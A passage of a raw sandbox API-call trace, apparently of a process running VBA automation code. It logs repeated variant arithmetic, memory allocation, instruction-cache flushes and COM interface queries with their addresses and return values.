(in: pvarLeft=0xaefdc68, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.932] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.932] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.932] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefdbf0, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.932] VarCmp (pvarLeft=0xaefdbc0, pvarRight=0xaefdba8, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.932] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefdb90, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.932] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.932] VarDiv (in: pvarLeft=0xaefdb60, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.932] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.932] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.932] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefdae8, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.932] VarCmp (pvarLeft=0xaefdab8, pvarRight=0xaefdaa0, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.932] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefda88, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.932] sqrt (_X=0x3) returned 0x41a0000000000000 [0069.932] VarDiv (in: pvarLeft=0xaefda58, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.932] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.932] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.932] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefd9e0, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.932] VarCmp (pvarLeft=0xaefd998, pvarRight=0xaefd980, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.933] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefd968, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.933] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.933] VarDiv (in: pvarLeft=0xaefd938, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.933] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.933] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.933] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefd8c0, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.933] VarCmp (pvarLeft=0xaefd890, pvarRight=0xaefd878, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.933] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefd860, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.933] sqrt (_X=0x3) returned 0x41a0000000000000 [0069.933] VarDiv (in: pvarLeft=0xaefd830, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.933] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.933] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.933] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefd7b8, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.933] VarCmp (pvarLeft=0xaefd770, pvarRight=0xaefd758, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.933] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefd740, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.933] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.933] VarDiv (in: pvarLeft=0xaefd710, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.933] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.933] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.933] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefd698, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.933] VarCmp (pvarLeft=0xaefd668, pvarRight=0xaefd650, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.933] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefd638, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.933] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.933] VarDiv (in: pvarLeft=0xaefd608, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.933] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.933] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.933] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefd590, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.933] VarCmp (pvarLeft=0xaefd560, pvarRight=0xaefd548, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.933] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefd530, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.934] sqrt (_X=0x3) returned 0x41b0000000000000 [0069.934] VarDiv (in: pvarLeft=0xaefd500, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.934] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.934] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.934] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefd488, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.934] VarAdd (in: pvarLeft=0xaeff138, pvarRight=0xaefef10, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.934] VarAdd (in: pvarLeft=0xaeff6b0, pvarRight=0xaefece8, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.934] VarAdd (in: pvarLeft=0xaeff620, pvarRight=0xaefe9b8, pvarResult=0xaeff5f0 | out: pvarResult=0xaeff5f0) returned 0x0 [0069.934] VarAdd (in: pvarLeft=0xaeff5f0, pvarRight=0xaefe790, pvarResult=0xaeff590 | out: pvarResult=0xaeff590) returned 0x0 [0069.934] VarAdd (in: pvarLeft=0xaeff590, pvarRight=0xaefe568, pvarResult=0xaeff560 | out: pvarResult=0xaeff560) returned 0x0 [0069.934] VarAdd (in: pvarLeft=0xaeff560, pvarRight=0xaefe340, pvarResult=0xaeff518 | out: pvarResult=0xaeff518) returned 0x0 [0069.934] VarAdd (in: pvarLeft=0xaeff518, pvarRight=0xaefe010, pvarResult=0xaeff500 | out: pvarResult=0xaeff500) returned 0x0 [0069.934] VarAdd (in: pvarLeft=0xaeff500, pvarRight=0xaefdce0, pvarResult=0xaeff4e8 | out: pvarResult=0xaeff4e8) returned 0x0 [0069.934] VarAdd (in: pvarLeft=0xaeff4e8, pvarRight=0xaefd9b0, pvarResult=0xaeff4b8 | out: pvarResult=0xaeff4b8) returned 0x0 [0069.934] VarAdd (in: pvarLeft=0xaeff4b8, pvarRight=0xaefd788, pvarResult=0xaeff488 | out: pvarResult=0xaeff488) returned 0x0 [0069.934] VarAdd (in: pvarLeft=0xaeff488, pvarRight=0xaefd458, pvarResult=0xaeff470 | out: pvarResult=0xaeff470) returned 0x0 [0069.934] VarAdd (in: pvarLeft=0xaeffe08, pvarRight=0xaeffdf0, pvarResult=0xaeffdd8 | out: pvarResult=0xaeffdd8) returned 0x0 [0069.935] IMalloc:Realloc (This=0x7fefec05380, pv=0xafdde80, cb=0x30000*=0x78746341) returned 0xb004bb0 [0069.938] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x68767a0 [0069.943] IMalloc:Realloc (This=0x7fefec05380, pv=0xafa6b90, cb=0x800) returned 0x62b9100 [0069.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba010e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="oBABoUAQ") returned 9 [0069.944] IMalloc:Realloc (This=0x7fefec05380, pv=0x69503b0, cb=0xc0) returned 0x6821210 [0069.944] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0xa9e0000 [0069.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba0356, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="GQAU_Dx") returned 8 [0069.945] IMalloc:Realloc (This=0x7fefec05380, pv=0x62fddf0, cb=0xc10) returned 0xb034bc0 [0069.945] IMalloc:Realloc (This=0x7fefec05380, pv=0xb034bc0, cb=0x1010) returned 0xb034bc0 [0069.945] IMalloc:Realloc (This=0x7fefec05380, pv=0xb034bc0, cb=0x1410) returned 0xaf287b0 [0069.945] IMalloc:Realloc (This=0x7fefec05380, pv=0x272e3b0, cb=0x618) returned 0xb034bc0 [0069.946] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf287b0, cb=0x1810) returned 0xaf287b0 [0069.946] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf287b0, cb=0x1c10) returned 0xaf287b0 [0069.946] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf287b0, cb=0x2010) returned 0xaf287b0 [0069.946] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf287b0, cb=0x2410) returned 0xaf287b0 [0069.946] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf287b0, cb=0x236e) returned 0xaf287b0 [0069.946] IMalloc:Free (This=0x7fefec05380, pv=0x680aac0) [0069.946] GetCurrentProcess () returned 0xffffffffffffffff [0069.946] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb6978, dwSize=0x8) returned 1 [0069.946] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb6238, dwSize=0x8) returned 1 [0069.946] GetCurrentProcess () returned 0xffffffffffffffff [0069.946] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb62f8, dwSize=0x8) returned 1 [0069.946] GetCurrentProcess () returned 0xffffffffffffffff [0069.946] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb68b8, dwSize=0x8) returned 1 [0069.946] GetCurrentProcess () returned 0xffffffffffffffff [0069.946] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb6978, dwSize=0x8) returned 1 [0069.946] GetCurrentProcess () returned 0xffffffffffffffff [0069.946] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb6a38, dwSize=0x8) returned 1 [0069.946] GetCurrentProcess () returned 0xffffffffffffffff [0069.946] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb6de0, dwSize=0x8) returned 1 [0069.946] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.946] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1462d8 | out: ppvObject=0x1462d8*=0x0) returned 0x80004002 [0069.946] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1462d0 | out: ppvObject=0x1462d0*=0x0) returned 0x80004002 [0069.946] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.947] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.947] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1462d8 | out: ppvObject=0x1462d8*=0x0) returned 0x80004002 [0069.947] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1462d0 | out: ppvObject=0x1462d0*=0x0) returned 0x80004002 [0069.947] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.947] VarCmp (pvarLeft=0xaeff6e0, pvarRight=0xaeff6c8, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.947] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff698, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.947] sqrt (_X=0x3) returned 0x41a0000000000000 [0069.947] VarDiv (in: pvarLeft=0xaeff650, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.947] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.947] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.947] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff378, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.947] VarCmp (pvarLeft=0xaeff348, pvarRight=0xaeff330, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.947] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff318, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.947] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.947] VarDiv (in: pvarLeft=0xaeff2e8, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.947] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.947] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.947] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff270, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.947] VarCmp (pvarLeft=0xaeff228, pvarRight=0xaeff210, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.947] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff1f8, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.947] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.947] VarDiv (in: pvarLeft=0xaeff1c8, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.947] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.947] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.947] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff150, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.948] VarCmp (pvarLeft=0xaeff120, pvarRight=0xaeff108, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.948] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff0f0, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.948] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.948] VarDiv (in: pvarLeft=0xaeff0c0, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.948] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.948] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.948] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff048, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.948] VarCmp (pvarLeft=0xaeff000, pvarRight=0xaefefe8, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.948] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefefd0, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.948] sqrt (_X=0x3) returned 0x4180000000000000 [0069.948] VarDiv (in: pvarLeft=0xaefefa0, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.948] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.948] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.948] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefef28, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.948] VarCmp (pvarLeft=0xaefeef8, pvarRight=0xaefeee0, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.948] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefeec8, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.948] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.948] VarDiv (in: pvarLeft=0xaefee98, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.948] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.948] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.948] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefee20, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.948] VarCmp (pvarLeft=0xaefedd8, pvarRight=0xaefedc0, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.948] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefeda8, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.948] sqrt (_X=0x3) returned 0x41b0000000000000 [0069.948] VarDiv (in: pvarLeft=0xaefed78, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.948] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.948] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.949] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefed00, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.949] VarCmp (pvarLeft=0xaefecd0, pvarRight=0xaefecb8, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.949] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefeca0, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.949] sqrt (_X=0x3) returned 0x41b0000000000000 [0069.949] VarDiv (in: pvarLeft=0xaefec70, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.949] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.949] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.949] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefebf8, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.949] VarCmp (pvarLeft=0xaefebc8, pvarRight=0xaefebb0, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.949] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefeb98, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.949] sqrt (_X=0x3) returned 0x41a0000000000000 [0069.949] VarDiv (in: pvarLeft=0xaefeb68, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.949] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.949] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.949] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefeaf0, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.949] VarCmp (pvarLeft=0xaefeaa8, pvarRight=0xaefea90, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.949] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefea78, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.949] sqrt (_X=0x3) returned 0x41b0000000000000 [0069.949] VarDiv (in: pvarLeft=0xaefea48, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.949] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.949] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.949] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe9d0, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.949] VarCmp (pvarLeft=0xaefe9a0, pvarRight=0xaefe988, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.949] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe970, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.949] sqrt (_X=0x3) returned 0x41b0000000000000 [0069.949] VarDiv (in: pvarLeft=0xaefe940, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.949] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.949] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.950] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe8c8, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.950] VarCmp (pvarLeft=0xaefe880, pvarRight=0xaefe868, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.950] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe850, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.950] sqrt (_X=0x3) returned 0x41b0000000000000 [0069.950] VarDiv (in: pvarLeft=0xaefe820, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.950] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.950] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.950] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe7a8, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.950] VarCmp (pvarLeft=0xaefe778, pvarRight=0xaefe760, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.950] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe748, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.950] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.950] VarDiv (in: pvarLeft=0xaefe718, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.950] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.950] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.950] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe6a0, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.950] VarCmp (pvarLeft=0xaefe670, pvarRight=0xaefe658, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.950] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe640, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.950] sqrt (_X=0x3) returned 0x41b0000000000000 [0069.950] VarDiv (in: pvarLeft=0xaefe610, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.950] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.950] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.950] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe598, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.950] VarCmp (pvarLeft=0xaefe550, pvarRight=0xaefe538, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.950] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe520, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.950] sqrt (_X=0x3) returned 0x41b0000000000000 [0069.950] VarDiv (in: pvarLeft=0xaefe4f0, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.950] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.951] RtlUnwindEx 